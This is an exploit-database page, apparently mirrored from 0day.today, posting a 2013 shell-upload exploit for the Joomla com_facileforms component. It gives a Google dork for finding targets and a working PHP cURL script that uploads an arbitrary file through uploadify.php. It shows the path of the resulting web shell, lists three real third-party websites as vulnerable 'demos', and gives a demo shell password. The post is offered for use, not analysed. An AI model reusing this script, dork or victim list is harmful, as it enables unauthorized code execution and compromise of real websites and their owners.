Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtZikou-161337DAY-ID-20279
HistoryFeb 02, 2013 - 12:00 a.m.

Joomla Component com_facileforms shell upload Vulnerability

2013-02-0200:00:00
Zikou-16
0day.today
20
JSON

The attacker can uplaod any file/shell.php .phtml .aspx .pl …

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Joomla Component com_facileforms shell upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => [email protected]
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/com_facileforms/"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod any file/shell.php .phtml .aspx .pl ......
------------------

#=> Note : u can use Uploadify jQuery Generic File Upload (Metasploit) for KedAns-Dz 

#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php";
$ch = curl_init("http://[target]/[path]/components/com_facileforms/libraries/jquery/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_facileforms/libraries/jquery/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/components/com_facileforms/libraries/jquery/zik.php
 
<?php
phpinfo();
?>
 
-----------

#=> Demo's
------------
http://worldleaguefootball.com/components/com_facileforms/libraries/jquery/uploadify.php

http://gv-herrliberg.ch/components/com_facileforms/libraries/jquery/uploadify.php

http://www.orion-construction.com/english/components/com_facileforms/libraries/jquery/uploadify.php
------------

=> Demo shell => change uploadify.php with x.php => shell password : dz0

#  0day.today [2018-04-11]  #
JSON